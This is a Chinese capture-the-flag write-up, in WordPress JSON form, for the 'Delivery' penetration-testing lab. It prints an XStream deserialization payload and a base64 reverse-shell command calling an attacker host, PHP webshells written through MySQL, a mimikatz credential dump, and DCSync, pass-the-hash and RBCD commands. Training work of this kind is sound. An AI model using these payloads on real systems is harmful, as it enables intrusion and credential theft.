{"id":927,"date":"2025-04-14T21:29:48","date_gmt":"2025-04-14T13:29:48","guid":{"rendered":"http:\/\/www.s1mh0.cn\/blog\/?p=927"},"modified":"2025-04-14T21:30:37","modified_gmt":"2025-04-14T13:30:37","slug":"cqyj_delivery","status":"publish","type":"post","link":"https:\/\/www.s1mh0.cn\/blog\/index.php\/2025\/04\/14\/cqyj_delivery\/","title":{"rendered":"\u6625\u79cb\u4e91\u5883-Delivery"},"content":{"rendered":"<h2>Delivery<\/h2>\n<p>\u6d89\u53ca\u7684\u77e5\u8bc6\u70b9<\/p>\n<pre><code class=\"language-text\">XStream RCE\uff08CVE-2021-29505\uff09\nNFS\u5229\u7528\nftp\u7684suid\u63d0\u6743\nmysql\u5199webshell\nACL ADMIN\u7ec4writeDacl\u7279\u6743\u5229\u7528\uff08DCSync\u6216RBCD\uff09<\/code><\/pre>\n<h3>flag1<\/h3>\n<p>\u626b\uff0c\u626b\u5230\u533f\u540dftp<\/p>\n<pre><code class=\"language-text\">start infoscan\n39.99.154.229:80 open\n39.99.154.229:22 open\n39.99.154.229:21 open\n39.99.154.229:8080 open\n[*] alive ports len is: 4\nstart vulscan\n[*] WebTitle http:\/\/39.99.154.229      code:200 len:10918  title:Apache2 Ubuntu Default Page: It works\n[*] WebTitle http:\/\/39.99.154.229:8080 code:200 len:3655   title:\u516c\u53f8\u53d1\u8d27\u5355\n[+] ftp 39.99.154.229:21:anonymous\n   [-&gt;]1.txt\n   [-&gt;]pom.xml<\/code><\/pre>\n<h4>XStream RCE\uff08CVE-2021-29505\uff09<\/h4>\n<p>\u6709pom.xml\uff0c\u770b\u5230xstream\u7248\u672c\u662f1.4.16\uff0c\u5e76\u4e14\u6709CC\u4f9d\u8d56\uff0c\u53ef\u4ee5\u6253CVE-2021-29505<\/p>\n<p><img decoding=\"async\" src=\"http:\/\/www.s1mh0.cn\/blog\/wp-content\/uploads\/2025\/04\/delivery_1.png\" alt=\"delivery_1\" \/><\/p>\n<p>\u4f7f\u7528 ysoseria l\u7684 JRMPListener \u542f\u52a8\u4e00\u4e2a\u6076\u610f\u7684 RMI Registry \u76d1\u542c\uff0c\u6536\u5230\u8bf7\u6c42\u540e\u4f1a\u8fd4\u56de\u7528 CC6 \u5229\u7528\u94fe\u6784\u9020\u7684\u6076\u610f\u5e8f\u5217\u5316\u5bf9\u8c61<\/p>\n<pre><code class=\"language-text\">java -cp ysoserial-0.0.6-SNAPSHOT-all.jar ysoserial.exploit.JRMPListener 1099 CommonsCollections6 &quot;bash -c {echo,Ym...MQ==}|{base64,-d}|{bash,-i}&quot;<\/code><\/pre>\n<p>\u7136\u540e\u5411\u670d\u52a1\u5668\u53d1\u9001XML POC<\/p>\n<pre><code class=\"language-text\">POST \/just_sumbit_it HTTP\/1.1\nHost: 39.99.154.229:8080\nAccept-Encoding: gzip, deflate\nAccept: *\/*\nAccept-Language: en\nUser-Agent: Mozilla\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\/537.36 (KHTML, like Gecko) Chrome\/87.0.4280.88 Safari\/537.36\nConnection: close\nContent-Type: application\/xml\nContent-Length: 3169\n\n&lt;java.util.PriorityQueue serialization=&#039;custom&#039;&gt;\n    &lt;unserializable-parents\/&gt;\n    &lt;java.util.PriorityQueue&gt;\n        &lt;default&gt;\n            &lt;size&gt;2&lt;\/size&gt;\n        &lt;\/default&gt;\n        &lt;int&gt;3&lt;\/int&gt;\n        &lt;javax.naming.ldap.Rdn_-RdnEntry&gt;\n            &lt;type&gt;12345&lt;\/type&gt;\n            &lt;value class=&#039;com.sun.org.apache.xpath.internal.objects.XString&#039;&gt;\n                &lt;m__obj class=&#039;string&#039;&gt;com.sun.xml.internal.ws.api.message.Packet@2002fc1d Content&lt;\/m__obj&gt;\n            &lt;\/value&gt;\n        &lt;\/javax.naming.ldap.Rdn_-RdnEntry&gt;\n        &lt;javax.naming.ldap.Rdn_-RdnEntry&gt;\n            &lt;type&gt;12345&lt;\/type&gt;\n            &lt;value class=&#039;com.sun.xml.internal.ws.api.message.Packet&#039; serialization=&#039;custom&#039;&gt;\n                &lt;message class=&#039;com.sun.xml.internal.ws.message.saaj.SAAJMessage&#039;&gt;\n                    &lt;parsedMessage&gt;true&lt;\/parsedMessage&gt;\n                    &lt;soapVersion&gt;SOAP_11&lt;\/soapVersion&gt;\n                    &lt;bodyParts\/&gt;\n                    &lt;sm class=&#039;com.sun.xml.internal.messaging.saaj.soap.ver1_1.Message1_1Impl&#039;&gt;\n                        &lt;attachmentsInitialized&gt;false&lt;\/attachmentsInitialized&gt;\n                        &lt;nullIter class=&#039;com.sun.org.apache.xml.internal.security.keys.storage.implementations.KeyStoreResolver$KeyStoreIterator&#039;&gt;\n                            &lt;aliases class=&#039;com.sun.jndi.toolkit.dir.LazySearchEnumerationImpl&#039;&gt;\n                                &lt;candidates class=&#039;com.sun.jndi.rmi.registry.BindingEnumeration&#039;&gt;\n                                    &lt;names&gt;\n                                        &lt;string&gt;aa&lt;\/string&gt;\n                                        &lt;string&gt;aa&lt;\/string&gt;\n                                    &lt;\/names&gt;\n                                    &lt;ctx&gt;\n                                        &lt;environment\/&gt;\n                                        &lt;registry class=&#039;sun.rmi.registry.RegistryImpl_Stub&#039; serialization=&#039;custom&#039;&gt;\n                                            &lt;java.rmi.server.RemoteObject&gt;\n                                                &lt;string&gt;UnicastRef&lt;\/string&gt;\n                                                &lt;string&gt;vpsip&lt;\/string&gt;\n                                                &lt;int&gt;1099&lt;\/int&gt;\n                                                &lt;long&gt;0&lt;\/long&gt;\n                                                &lt;int&gt;0&lt;\/int&gt;\n                                                &lt;long&gt;0&lt;\/long&gt;\n                                                &lt;short&gt;0&lt;\/short&gt;\n                                                &lt;boolean&gt;false&lt;\/boolean&gt;\n                                            &lt;\/java.rmi.server.RemoteObject&gt;\n                                        &lt;\/registry&gt;\n                                        &lt;host&gt;vpsip&lt;\/host&gt;\n                                        &lt;port&gt;1099&lt;\/port&gt;\n                                    &lt;\/ctx&gt;\n                                &lt;\/candidates&gt;\n                            &lt;\/aliases&gt;\n                        &lt;\/nullIter&gt;\n                    &lt;\/sm&gt;\n                &lt;\/message&gt;\n            &lt;\/value&gt;\n        &lt;\/javax.naming.ldap.Rdn_-RdnEntry&gt;\n    &lt;\/java.util.PriorityQueue&gt;\n&lt;\/java.util.PriorityQueue&gt;<\/code><\/pre>\n<p><img decoding=\"async\" src=\"http:\/\/www.s1mh0.cn\/blog\/wp-content\/uploads\/2025\/04\/delivery_2.png\" alt=\"delivery_2\" \/><\/p>\n<p><img decoding=\"async\" src=\"http:\/\/www.s1mh0.cn\/blog\/wp-content\/uploads\/2025\/04\/delivery_3.png\" alt=\"delivery_3\" \/><\/p>\n<pre><code class=\"language-text\">flag{7550a6e1-f104-4623-9e22-635ad8ef9500}<\/code><\/pre>\n<h3>flag2<\/h3>\n<p>\u4f20fscan\u3001gost<\/p>\n<pre><code>start infoscan\n(icmp) Target 172.22.13.14    is alive\n(icmp) Target 172.22.13.28    is alive\n(icmp) Target 172.22.13.6     is alive\n(icmp) Target 172.22.13.57    is alive\n[*] Icmp alive hosts len is: 4\n172.22.13.6:88 open\n172.22.13.14:8080 open\n172.22.13.28:8000 open\n172.22.13.28:3306 open\n172.22.13.6:445 open\n172.22.13.28:445 open\n172.22.13.6:139 open\n172.22.13.28:139 open\n172.22.13.6:135 open\n172.22.13.28:135 open\n172.22.13.57:80 open\n172.22.13.57:22 open\n172.22.13.14:80 open\n172.22.13.14:22 open\n172.22.13.14:21 open\n172.22.13.28:80 open\n[*] alive ports len is: 16\nstart vulscan\n[*] NetInfo \n[*]172.22.13.28\n   [-&gt;]WIN-HAUWOLAO\n   [-&gt;]172.22.13.28\n[*] WebTitle http:\/\/172.22.13.28       code:200 len:2525   title:\u6b22\u8fce\u767b\u5f55OA\u529e\u516c\u5e73\u53f0\n[*] NetInfo \n[*]172.22.13.6\n   [-&gt;]WIN-DC\n   [-&gt;]172.22.13.6\n[*] WebTitle http:\/\/172.22.13.57       code:200 len:4833   title:Welcome to CentOS\n[*] NetBios 172.22.13.6     [+] DC:XIAORANG\\WIN-DC         \n[*] WebTitle http:\/\/172.22.13.14:8080  code:200 len:3655   title:\u516c\u53f8\u53d1\u8d27\u5355\n[*] WebTitle http:\/\/172.22.13.14       code:200 len:10918  title:Apache2 Ubuntu Default Page: It works\n[*] NetBios 172.22.13.28    WIN-HAUWOLAO.xiaorang.lab           Windows Server 2016 Datacenter 14393\n[*] WebTitle http:\/\/172.22.13.28:8000  code:200 len:170    title:Nothing Here.\n[+] ftp 172.22.13.14:21:anonymous \n   [-&gt;]1.txt\n   [-&gt;]pom.xml\n[+] mysql 172.22.13.28:3306:root 123456\n\u5df2\u5b8c\u6210 16\/16\n[*] \u626b\u63cf\u7ed3\u675f,\u8017\u65f6: 17.4844434s<\/code><\/pre>\n<h4>NFS\u5229\u7528<\/h4>\n<p>\u6839\u636e\u7b2c\u4e8c\u5173\u5173\u5361\u5267\u60c5\u63d0\u793a\uff0c\u6709\u53f0\u4e3b\u673a\u5b58\u5728NFS\u670d\u52a1<\/p>\n<p><img decoding=\"async\" src=\"http:\/\/www.s1mh0.cn\/blog\/wp-content\/uploads\/2025\/04\/delivery_4.png\" alt=\"delivery_4\" \/><\/p>\n<p>\u67e5\u8be2\u8fdc\u7a0b\u8fc7\u7a0b\u8c03\u7528\uff08RPC\uff09\u670d\u52a1\u4fe1\u606f<\/p>\n<pre><code class=\"language-text\">proxychains4 -q rpcinfo -p 172.22.13.57<\/code><\/pre>\n<p><img decoding=\"async\" src=\"http:\/\/www.s1mh0.cn\/blog\/wp-content\/uploads\/2025\/04\/delivery_5.png\" alt=\"delivery_5\" \/><\/p>\n<p>\u5217\u51faNFS\u670d\u52a1\u5668\u4e0a\u7684\u5171\u4eab\u4fe1\u606f<\/p>\n<pre><code class=\"language-text\">proxychains4 -q showmount -e 172.22.13.57<\/code><\/pre>\n<p><img decoding=\"async\" src=\"http:\/\/www.s1mh0.cn\/blog\/wp-content\/uploads\/2025\/04\/delivery_6.png\" alt=\"delivery_6\" \/><\/p>\n<p>\u63a5\u7740\u5230\u5165\u53e3\u673a\u90a3\u91cc\uff0c\u5b89\u88c5\u4e00\u4e0bnfs<\/p>\n<pre><code class=\"language-shell\">apt-get update\napt-get install nfs-common -y<\/code><\/pre>\n<p>\u5c06<code>\/home\/joyce<\/code>\u6302\u8f7d\u5230\u672c\u5730<\/p>\n<pre><code class=\"language-shell\">mkdir simho\nmount -t nfs 172.22.13.57:\/home\/joyce .\/simho<\/code><\/pre>\n<p>\u5199SSH\u516c\u94a5\u767b\u5f55<\/p>\n<pre><code class=\"language-shell\">cd simho\nmkdir .ssh\nssh-keygen -t rsa -b 4096\ncat \/root\/.ssh\/id_rsa.pub &gt;&gt; \/tmp\/simho\/.ssh\/authorized_keys\nssh joyce@172.22.13.57<\/code><\/pre>\n<p><img decoding=\"async\" src=\"http:\/\/www.s1mh0.cn\/blog\/wp-content\/uploads\/2025\/04\/delivery_7.png\" alt=\"delivery_7\" \/><\/p>\n<h4>ftp\u7684suid\u63d0\u6743<\/h4>\n<p>\u7b2c\u4e8c\u4e2aflag\u5728\u6839\u76ee\u5f55\u4e0b\uff0c\u4f46\u662fjoyce\u7528\u6237\u6ca1\u6709\u8bfb\u7684\u6743\u9650\uff0c\u67e5\u8be2suid\u6587\u4ef6\u53d1\u73b0\u6709ftp<\/p>\n<p>\u5148\u5728\u5165\u53e3\u673a\u5f00\u542fftp\u670d\u52a1\uff1a<\/p>\n<pre><code class=\"language-text\">python3 -m pyftpdlib -p 9999 -u simho -P simho -w &amp;<\/code><\/pre>\n<p>\u7136\u540ecentos\u8fd9\u53f0\u673a\u8fde\u63a5ftp<\/p>\n<pre><code class=\"language-text\">ftp 172.22.13.14 9999<\/code><\/pre>\n<p>\u8fde\u63a5\u540e\u7528<code>put<\/code>\u547d\u4ee4\u5c06flag02.txt\u4e0a\u4f20\u5230\u5165\u53e3\u673a<\/p>\n<p><img decoding=\"async\" src=\"http:\/\/www.s1mh0.cn\/blog\/wp-content\/uploads\/2025\/04\/delivery_8.png\" alt=\"delivery_8\" \/><\/p>\n<p><img decoding=\"async\" src=\"http:\/\/www.s1mh0.cn\/blog\/wp-content\/uploads\/2025\/04\/delivery_9.png\" alt=\"delivery_9\" \/><\/p>\n<pre><code class=\"language-text\">flag{1e4b7acc-13a9-4234-a59a-8d9889dbd6cd}<\/code><\/pre>\n<h3>flag3<\/h3>\n<h4>mysql\u5199webshell<\/h4>\n<p>\u7b2c\u4e09\u5173\u5267\u60c5\u8fd8\u6ca1\u5229\u7528\u5230\u57df\uff0c\u5148\u770b\u626b\u5230\u7684mysql\u5f31\u5bc6\u7801<\/p>\n<pre><code class=\"language-mysql\">show variables like &quot;secure_file_priv&quot;;<\/code><\/pre>\n<p><code>secure_file_priv<\/code>\u4e0d\u4e3aNULL\uff0c\u53ef\u4ee5\u5199\u6587\u4ef6<\/p>\n<p>\u518d\u770b\u5230data\u7edd\u5bf9\u8def\u5f84\u662f\u5728phpstudy\u91cc\u7684\uff0c\u53ef\u4ee5\u76f4\u63a5\u5728WWW\u5199webshell<\/p>\n<pre><code class=\"language-mysql\">show variables like &quot;%datadir%&quot;<\/code><\/pre>\n<p><img decoding=\"async\" src=\"http:\/\/www.s1mh0.cn\/blog\/wp-content\/uploads\/2025\/04\/delivery_10.png\" alt=\"delivery_10\" \/><\/p>\n<p>\u53ef\u4ee5\u76f4\u63a5\u7528<code>into outfile<\/code>\u5199webshell<\/p>\n<pre><code class=\"language-mysql\">select &quot;&lt;?php eval($_POST[1]);?&gt;&quot; into outfile &quot;C:\/phpstudy_pro\/WWW\/1.php&quot;;<\/code><\/pre>\n<p>\u6216\u8005\u5229\u7528\u65e5\u5fd7\u8bb0\u5f55\u5199webshell<\/p>\n<p>\u67e5\u8be2\u65e5\u5fd7\u4fdd\u5b58\u72b6\u6001\u548c\u65e5\u5fd7\u4fdd\u5b58\u8def\u5f84<\/p>\n<pre><code class=\"language-mysql\">show variables like &#039;%general%&#039;;<\/code><\/pre>\n<p>\u67e5\u770b\u662f\u5426\u5f00\u542f\u4e86secure\u4fdd\u62a4<\/p>\n<pre><code class=\"language-mysql\">show variables like &#039;%secure%&#039;;<\/code><\/pre>\n<p>\u5f00\u542f\u65e5\u5fd7\u5e76\u4fee\u6539\u65e5\u5fd7\u4fdd\u5b58\u8def\u5f84<\/p>\n<pre><code class=\"language-mysql\">set global general_log=&#039;On&#039;;\nset global general_log_file=&#039;C:\/phpstudy_pro\/WWW\/2.php&#039;;<\/code><\/pre>\n<p>\u5728\u65e5\u5fd7\u6587\u4ef6\u4e2d\u5199\u5165webshell<\/p>\n<pre><code class=\"language-mysql\">select &#039;&lt;?php eval($_POST[1]);?&gt;&#039;;<\/code><\/pre>\n<p>\u8681\u5251\u8fde\u63a5\u662fsystem\u6743\u9650\uff0c\u6dfb\u52a0\u7ba1\u7406\u5458\u8d26\u6237\u4e0a\u53bb\u62ff\u7b2c\u4e09\u4e2aflag<\/p>\n<p><img decoding=\"async\" src=\"http:\/\/www.s1mh0.cn\/blog\/wp-content\/uploads\/2025\/04\/delivery_11.png\" alt=\"delivery_11\" \/><\/p>\n<p><img decoding=\"async\" src=\"http:\/\/www.s1mh0.cn\/blog\/wp-content\/uploads\/2025\/04\/delivery_12.png\" alt=\"delivery_12\" \/><\/p>\n<p><img decoding=\"async\" src=\"http:\/\/www.s1mh0.cn\/blog\/wp-content\/uploads\/2025\/04\/delivery_13.png\" alt=\"delivery_13\" \/><\/p>\n<pre><code class=\"language-text\">flag{fa1f1c2a-d670-4e55-a0dc-ca65d6906228} <\/code><\/pre>\n<h3>flag4<\/h3>\n<p>\u524d\u9762centos\u6839\u76ee\u5f55\u8fd8\u6709\u4e2apAss.txt \uff0c\u5f97\u5230\u4e00\u7ec4\u57df\u7528\u6237\u8d26\u5bc6<\/p>\n<pre><code class=\"language-text\">[joyce@centos ~]$ cat \/pAss.txt \nxiaorang.lab\/zhangwen\\QT62f3gBhK1<\/code><\/pre>\n<p>RDP\u767b\u5f55\u524d\u9762\u626b\u5230\u7684<code>172.22.13.28<\/code>\u8fd9\u53f0\u4e3b\u673a<\/p>\n<pre><code class=\"language-text\">zhangwen@xiaorang.lab\/QT62f3gBhK1<\/code><\/pre>\n<p>bloodhound\u57df\u4fe1\u606f\u6536\u96c6<\/p>\n<p><img decoding=\"async\" src=\"http:\/\/www.s1mh0.cn\/blog\/wp-content\/uploads\/2025\/04\/delivery_14.png\" alt=\"delivery_14\" \/><\/p>\n<h4>writeDacl\u7279\u6743\u5229\u7528<\/h4>\n<p>\u770b\u5230CHANGLEI\u7528\u6237\u662f\u5728ACL ADMIN\u7ec4\u7684\uff0c\u5e76\u4e14\u6709WriteDacl\u6743\u9650\uff0c\u53ef\u4ee5\u6253<code>DCSync<\/code>\u6216<code>RBCD<\/code><\/p>\n<p>mimikatz\u80fd\u6536\u96c6\u5230chenglei\u7528\u6237\u7684htlm\u548c\u660e\u6587\u5bc6\u7801<\/p>\n<pre><code class=\"language-text\">mimikatz.exe &quot;privilege::debug&quot; &quot;sekurlsa::logonpasswords&quot; &quot;exit&quot; &gt; 1.txt\n\n......\nUser Name         : chenglei\nDomain            : XIAORANG\nLogon Server      : WIN-DC\nLogon Time        : 2025\/3\/12 22:37:08\nSID               : S-1-5-21-3269458654-3569381900-10559451-1105\n    msv :   \n     [00000003] Primary\n     * Username : chenglei\n     * Domain   : XIAORANG\n     * NTLM     : 0c00801c30594a1b8eaa889d237c5382\n     * SHA1     : e8848f8a454e08957ec9814b9709129b7101fad7\n     * DPAPI    : 89b179dc738db098372c365602b7b0f4\n    tspkg : \n    wdigest :   \n     * Username : chenglei\n     * Domain   : XIAORANG\n     * Password : (null)\n    kerberos :  \n     * Username : chenglei\n     * Domain   : XIAORANG.LAB\n     * Password : Xt61f3LBhg1\n......<\/code><\/pre>\n<pre><code class=\"language-text\">chenglei\/0c00801c30594a1b8eaa889d237c5382\/Xt61f3LBhg1<\/code><\/pre>\n<h5>DCSync<\/h5>\n<p>\u5229\u7528dacledit.py\u7ed9changlei\u7528\u6237\u6dfb\u52a0 DCSync \u6743\u9650\uff1a<\/p>\n<pre><code class=\"language-text\">proxychains4 -q python3 dacledit.py xiaorang.lab\/chenglei:&#039;Xt61f3LBhg1&#039; -action write -rights DCSync -principal chenglei -target-dn &#039;DC=xiaorang,DC=lab&#039; -dc-ip 172.22.13.6<\/code><\/pre>\n<p><img decoding=\"async\" src=\"http:\/\/www.s1mh0.cn\/blog\/wp-content\/uploads\/2025\/04\/delivery_15.png\" alt=\"delivery_15\" \/><\/p>\n<p>\u4ece\u57df\u63a7\u5bfc\u51faadministrator\u54c8\u5e0c<\/p>\n<pre><code class=\"language-text\">proxychains4 -q impacket-secretsdump xiaorang.lab\/chenglei:Xt61f3LBhg1@172.22.13.28 -target-ip 172.22.13.6 -just-dc-ntlm<\/code><\/pre>\n<p><img decoding=\"async\" src=\"http:\/\/www.s1mh0.cn\/blog\/wp-content\/uploads\/2025\/04\/delivery_16.png\" alt=\"delivery_16\" \/><\/p>\n<p>PTH\u5230\u57df\u63a7\u62ff\u6700\u540e\u4e00\u4e2aflag<\/p>\n<pre><code class=\"language-text\">proxychains4 -q impacket-smbexec -hashes :6341235defdaed66fb7b682665752c9a administrator@172.22.13.6 -codec gbk<\/code><\/pre>\n<p><img decoding=\"async\" src=\"http:\/\/www.s1mh0.cn\/blog\/wp-content\/uploads\/2025\/04\/delivery_17.png\" alt=\"delivery_17\" \/><\/p>\n<h5>RBCD<\/h5>\n<p>\u521b\u5efa\u53d7\u63a7\u8ba1\u7b97\u673a\u8d26\u6237\uff0c\u540e\u7eed\u901a\u8fc7\u8be5\u8d26\u6237\u914d\u7f6e\u59d4\u6d3e\u6743\u9650<\/p>\n<pre><code class=\"language-text\">proxychains4 -q impacket-addcomputer &quot;xiaorang.lab\/chenglei&quot; -hashes :0c00801c30594a1b8eaa889d237c5382 -computer-name &#039;simho$&#039; -computer-pass &#039;whoami@123&#039; -dc-ip 172.22.13.6<\/code><\/pre>\n<p>\u914d\u7f6e RBCD \u59d4\u6d3e\u5173\u7cfb\uff0c\u5141\u8bb8 <code>simho$<\/code> \u6a21\u62df <code>WIN-DC$<\/code> \u4e0a\u7684\u4efb\u610f\u7528\u6237\uff08\u5982\u57df\u7ba1\u7406\u5458\uff09\uff0c\u4ece\u800c\u83b7\u53d6\u9ad8\u6743\u9650\u7968\u636e<\/p>\n<pre><code class=\"language-text\">proxychains4 -q impacket-rbcd &quot;xiaorang.lab\/chenglei&quot; -hashes :0c00801c30594a1b8eaa889d237c5382 -action write -delegate-from &quot;simho$&quot; -delegate-to &quot;WIN-DC$&quot; -dc-ip 172.22.13.6<\/code><\/pre>\n<p>\u4f7f\u7528 <code>impacket-getST<\/code> \u901a\u8fc7 S4U2Self \u548c S4U2Proxy \u534f\u8bae\uff0c\u4ee5 <code>simho$<\/code> \u7684\u8eab\u4efd\u8bf7\u6c42 <code>Administrator<\/code> \u7528\u6237\u7684 Kerberos \u670d\u52a1\u7968\u636e\uff08TGS\uff09<\/p>\n<pre><code class=\"language-text\">proxychains4 -q impacket-getST xiaorang.lab\/simho$:&#039;whoami@123&#039; -dc-ip 172.22.13.6 -spn ldap\/WIN-DC.xiaorang.lab -impersonate Administrator<\/code><\/pre>\n<p><img decoding=\"async\" src=\"http:\/\/www.s1mh0.cn\/blog\/wp-content\/uploads\/2025\/04\/delivery_18.png\" alt=\"delivery_18\" \/><\/p>\n<p>\u8bbe\u7f6e Kerberos \u7968\u636e\u7f13\u5b58<\/p>\n<pre><code class=\"language-text\">export KRB5CCNAME=Administrator.ccache<\/code><\/pre>\n<p>\u5229\u7528\u7968\u636e\u6a2a\u5411\u79fb\u52a8\u5230\u57df\u63a7\uff0c\u62ff\u6700\u540e\u4e00\u4e2aflag<\/p>\n<pre><code class=\"language-text\">proxychains4 -q impacket-psexec &#039;xiaorang.lab\/administrator@WIN-DC.xiaorang.lab&#039; -target-ip 172.22.13.6 -codec gbk -no-pass -k<\/code><\/pre>\n<p>\u8fd9\u91cc\u4e0d\u6539\/etc\/hosts\u8c8c\u4f3c\u4e5f\u80fd\u8fde<\/p>\n<p><img decoding=\"async\" src=\"http:\/\/www.s1mh0.cn\/blog\/wp-content\/uploads\/2025\/04\/delivery_19.png\" alt=\"delivery_19\" \/><\/p>\n<pre><code class=\"language-text\">flag{b9436658-3b0c-4dfc-b0d4-138fe1108466}<\/code><\/pre>\n<div class=\"clearfix\"><\/div>","protected":false},"excerpt":{"rendered":"<p>Delivery \u6d89\u53ca\u7684\u77e5\u8bc6\u70b9 XStream RCE\uff08CVE-2021-29505\uff09 NFS\u5229\u7528 ftp\u7684s [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[7],"tags":[],"class_list":["post-927","post","type-post","status-publish","format-standard","hentry","category-pentesting"],"views":834,"_links":{"self":[{"href":"https:\/\/www.s1mh0.cn\/blog\/index.php\/wp-json\/wp\/v2\/posts\/927","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.s1mh0.cn\/blog\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.s1mh0.cn\/blog\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.s1mh0.cn\/blog\/index.php\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/www.s1mh0.cn\/blog\/index.php\/wp-json\/wp\/v2\/comments?post=927"}],"version-history":[{"count":2,"href":"https:\/\/www.s1mh0.cn\/blog\/index.php\/wp-json\/wp\/v2\/posts\/927\/revisions"}],"predecessor-version":[{"id":929,"href":"https:\/\/www.s1mh0.cn\/blog\/index.php\/wp-json\/wp\/v2\/posts\/927\/revisions\/929"}],"wp:attachment":[{"href":"https:\/\/www.s1mh0.cn\/blog\/index.php\/wp-json\/wp\/v2\/media?parent=927"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.s1mh0.cn\/blog\/index.php\/wp-json\/wp\/v2\/categories?post=927"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.s1mh0.cn\/blog\/index.php\/wp-json\/wp\/v2\/tags?post=927"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}